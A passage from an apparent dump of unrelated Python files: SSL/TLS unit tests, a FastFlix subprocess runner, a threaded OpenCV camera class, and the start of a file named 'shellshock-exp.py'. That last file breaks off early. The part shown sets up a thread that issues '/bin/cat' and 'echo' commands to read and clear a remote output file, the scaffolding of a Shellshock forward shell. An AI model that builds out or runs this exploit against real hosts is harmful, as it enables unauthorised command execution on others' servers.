"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
            # and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # the certificate from other_context (SIGNED_CERTFILE2) was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
            if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
                # can set session before handshake, i.e. before the
                # connection is established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
command_runner.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import re
import secrets
import shlex
from pathlib import Path
from subprocess import PIPE
from threading import Thread
from psutil import Popen
logger = logging.getLogger("fastflix-core")
__all__ = ["BackgroundRunner"]
white_detect = re.compile(r"^\s+")
class BackgroundRunner:
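    # Runs an encoder command (or two piped commands) in the background,
    # mirrors its stdout/stderr into log_queue, and scans the output for the
    # configured success/error marker strings.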
def __init__(self, log_queue):
self.process = None
self.process_two = None
self.killed = False
self.output_file = None
self.error_output_file = None
self.log_queue = log_queue
self.error_detected = False
self.success_detected = False
self.error_message = []
self.success_message = []
def start_exec(self, command, work_dir: str = None, shell: bool = False, errors=(), successes=()):
self.clean()
logger.info(f"Running command: {command}")
Path(work_dir).mkdir(exist_ok=True, parents=True)
self.output_file = Path(work_dir) / f"encoder_output_{secrets.token_hex(6)}.log"
self.error_output_file = Path(work_dir) / f"encoder_error_output_{secrets.token_hex(6)}.log"
self.output_file.touch(exist_ok=True)
self.error_output_file.touch(exist_ok=True)
self.error_message = errors
self.success_message = successes
self.process = Popen(
shlex.split(command) if not shell and isinstance(command, str) else command,
shell=shell,
cwd=work_dir,
stdout=open(self.output_file, "w"),
stderr=open(self.error_output_file, "w"),
            stdin=PIPE, # FFmpeg can try to read stdin and wreak havoc on Linux
encoding="utf-8",
)
Thread(target=self.read_output).start()
def start_piped_exec(self, command_one, command_two, work_dir, errors=(), successes=()):
self.clean()
logger.info(f"Running commands: {' '.join(command_one)} | {' '.join(command_two)}")
Path(work_dir).mkdir(exist_ok=True, parents=True)
self.output_file = Path(work_dir) / f"encoder_output_{secrets.token_hex(6)}.log"
self.error_output_file = Path(work_dir) / f"encoder_error_output_{secrets.token_hex(6)}.log"
self.output_file.touch(exist_ok=True)
self.error_output_file.touch(exist_ok=True)
self.error_message = errors
self.success_message = successes
self.process = Popen(
command_one,
cwd=work_dir,
stdout=PIPE,
stderr=PIPE,
            stdin=PIPE, # FFmpeg can try to read stdin and wreak havoc on Linux
)
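        # Chain the two processes like a shell pipeline: the first process's
        # stdout feeds directly into the second process's stdin.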
self.process_two = Popen(
command_two,
cwd=work_dir,
stdout=open(self.output_file, "w"),
stderr=open(self.error_output_file, "w"),
stdin=self.process.stdout,
encoding="utf-8",
)
self.error_detected = False
Thread(target=self.read_output).start()
def read_output(self):
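        # The subprocess writes stdout/stderr to the log files opened in
        # start_exec/start_piped_exec, so this thread tails those files rather
        # than reading the pipes directly (presumably to keep a full log on
        # disk and avoid blocking reads).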
with open(self.output_file, "r", encoding="utf-8", errors="ignore") as out_file, open(
self.error_output_file, "r", encoding="utf-8", errors="ignore"
) as err_file:
while True:
if not self.is_alive():
excess = out_file.read()
logger.info(excess)
self.log_queue.put(excess)
err_excess = err_file.read()
logger.info(err_excess)
self.log_queue.put(err_excess)
break
line = out_file.readline().rstrip()
if line:
logger.info(line)
self.log_queue.put(line)
if not self.success_detected:
for success in self.success_message:
if success in line:
self.success_detected = True
err_line = err_file.readline().rstrip()
if err_line:
logger.info(err_line)
self.log_queue.put(err_line)
if "Conversion failed!" in err_line:
self.error_detected = True
if not self.error_detected:
for error in self.error_message:
if error in err_line:
self.error_detected = True
try:
self.output_file.unlink()
self.error_output_file.unlink()
except OSError:
pass
def read(self, limit=None):
if not self.is_alive():
return
return self.process.stdout.read(limit)
def is_alive(self):
if not self.process:
return False
if self.process_two:
# TODO make sure process 1 dies cleanly
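            # For piped runs, liveness is judged by the downstream process;
            # the upstream process is assumed to exit on its own once its
            # output is consumed (see the TODO above).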
            return self.process_two.poll() is None
        return self.process.poll() is None
def clean(self):
self.kill(log=False)
self.process = None
self.process_two = None
self.error_detected = False
self.success_detected = False
self.killed = False
def kill(self, log=True):
if self.process_two:
if log:
logger.info(f"Killing worker process {self.process_two.pid}")
try:
self.process_two.terminate()
self.process_two.kill()
except Exception as err:
if log:
logger.exception(f"Couldn't terminate process: {err}")
if self.process:
if log:
logger.info(f"Killing worker process {self.process.pid}")
try:
# if reusables.win_based:
# os.kill(self.process.pid, signal.CTRL_C_EVENT)
# else:
# os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
self.process.terminate()
self.process.kill()
except Exception as err:
if log:
logger.exception(f"Couldn't terminate process: {err}")
self.killed = True
def pause(self):
if self.process_two:
return False
if not self.process:
return False
self.process.suspend()
def resume(self):
if self.process_two:
return False
if not self.process:
return False
self.process.resume()
# if __name__ == "__main__":
# from queue import Queue
#
# logging.basicConfig(level=logging.DEBUG)
# br = BackgroundRunner(Queue())
# import shutil
#
# ffmpeg = shutil.which("ffmpeg")
# br.start_piped_exec(
# command_one=shlex.split(
# rf'"{ffmpeg}" -loglevel panic -i C:\\Users\\Chris\\scoob_short.mkv -c:v copy -vbsf hevc_mp4toannexb -f hevc -'
# ),
# command_two=shlex.split(r'"C:\\Users\\Chris\\ffmpeg\\hdr10plus_parser.exe" --verify -'),
# work_dir=r"C:\Users\Chris",
# )
# import time
# time.sleep(1)
# br.read_output()
|
Camera.py
|
#!/usr/bin/env python3
# encoding:utf-8
import sys
import cv2
import time
import threading
import numpy as np
if sys.version_info.major == 2:
print('Please run this program with python3!')
sys.exit(0)
class Camera:
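    # Threaded camera wrapper: a daemon thread keeps the latest resized frame
    # in self.frame so callers can grab it without blocking on the device.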
def __init__(self, resolution=(640, 480)):
self.cap = None
self.width = resolution[0]
self.height = resolution[1]
self.frame = None
self.opened = False
self.th = threading.Thread(target=self.camera_task, args=(), daemon=True)
self.th.start()
def camera_open(self):
try:
self.cap = cv2.VideoCapture(-1)
self.cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('Y', 'U', 'Y', 'V'))
self.cap.set(cv2.CAP_PROP_FPS, 30)
self.cap.set(cv2.CAP_PROP_SATURATION, 40)
self.opened = True
except Exception as e:
            print('Failed to open camera:', e)
def camera_close(self):
try:
self.opened = False
time.sleep(0.2)
if self.cap is not None:
self.cap.release()
time.sleep(0.05)
self.cap = None
except Exception as e:
            print('Failed to close camera:', e)
def camera_task(self):
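        # Background loop: grab frames while the camera is open and try to
        # re-open the capture device whenever a read fails.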
while True:
try:
if self.opened and self.cap.isOpened():
ret, frame_tmp = self.cap.read()
if ret:
self.frame = cv2.resize(frame_tmp, (self.width, self.height), interpolation=cv2.INTER_NEAREST)
ret = False
else:
self.frame = None
self.cap.release()
cap = cv2.VideoCapture(-1)
ret, _ = cap.read()
if ret:
self.cap = cap
elif self.opened:
self.cap.release()
cap = cv2.VideoCapture(-1)
ret, _ = cap.read()
if ret:
self.cap = cap
else:
time.sleep(0.01)
except Exception as e:
                print('Error reading camera frame:', e)
time.sleep(0.01)
if __name__ == '__main__':
my_camera = Camera()
my_camera.camera_open()
    print('Raw camera feed, no distortion correction applied')
while True:
img = my_camera.frame
if img is not None:
cv2.imshow('img', img)
key = cv2.waitKey(1)
if key == 27:
break
my_camera.camera_close()
cv2.destroyAllWindows()
|
shellshock-exp.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# from IPython.core.debugger import Tracer; breakpoint = Tracer()
import requests
import time
from base64 import b64encode
from random import randrange
import threading
class AllTheReads(object):
def __init__(self, interval=1):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
readoutput = """/bin/cat %s""" % (stdout)
clearoutput = """echo '' > %s""" % (stdout)
while True:
